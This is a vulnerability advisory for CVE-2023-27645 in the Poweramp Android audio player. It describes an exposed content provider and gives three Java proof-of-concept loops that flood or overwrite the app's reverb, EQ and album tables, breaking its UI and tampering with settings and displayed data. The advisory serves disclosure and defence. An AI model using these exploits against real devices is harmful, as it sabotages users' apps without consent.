Escalation of Privileges exists in POWERAMP (CVE-2023-27645)
Vendor: POWERAMP (https://powerampapp.com/)
Affected product: Poweramp (com.maxmpz.audioplayer)
Version: build-954-uni
Download link: https://play.google.com/store/apps/details?id=com.maxmpz.audioplayer
Description of the vulnerability for use in the CVE: An issue found in POWERAMP audioplayer build 925 bundle play and build 954 allows a remote attacker to gain privileges via the reverb and EQ preset parameters.
Additional information: Poweramp is a well-known music player for Android. During its initialization phase, the application reads data saved in its database. Some of this data is used for UI display, such as album names, while other data controls application function settings, such as reverb and EQ presets. If a malicious application modifies this key data in the database, it can cause UI hijacking, such as arbitrary modification of album names, and function manipulation, such as arbitrary setting of reverb effects.

1. Inserting a large amount of data into the database causes the reverb effect preset selection to disappear and the main page UI to fail, with no touch feedback, and the attacker can insert any reverb effect of their choosing. In addition, the attacker can modify the values of the original default reverb effects, or even set them all to zero to turn the reverb effect off.
PoC:
public void attack(){
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/reverb_presets");
    while (true) {
        ContentValues contentValues = new ContentValues();
        // getRandomString() is a helper that is not shown here; its result is unused in this PoC
        String randomString = getRandomString(5120);
        contentValues.put("name","hack");
        contentValues.put("_data","1=0.0;2=0.0;3=0.0;4=0.0;5=0.0;6=0.0;7=0.0;8=0.0;");
        contentResolver.insert(uri,contentValues);
    }
}

2. By inserting data into the database or modifying existing data, the attacker can arbitrarily set the initial values of the various audio effects or add arbitrary custom audio effects.
PoC:
public void attack(){
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/eq_presets");
    while (true) {
        ContentValues contentValues = new ContentValues();
        // getRandomString() is a helper that is not shown here; its result is unused in this PoC
        String randomString = getRandomString(5120);
        contentValues.put("_data","31=0.0;62=0.0;125=0.0;250=0.0;500=0.0;1K=0.0;2K=0;4K=0;8K=0;16K=0;preamp=0");
        contentResolver.update(uri,contentValues,null,null);
    }
}

3. Modifying the album name in the database tampers with the UI content of the Albums page and also affects the album shown while a song is playing.
PoC:
public void attack(){
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/albums");
    while (true) {
        ContentValues contentValues = new ContentValues();
        // getRandomString() is a helper that is not shown here
        String randomString = getRandomString(5120);
        contentValues.put("album",randomString);
        contentResolver.update(uri,contentValues,null,null);
    }
}


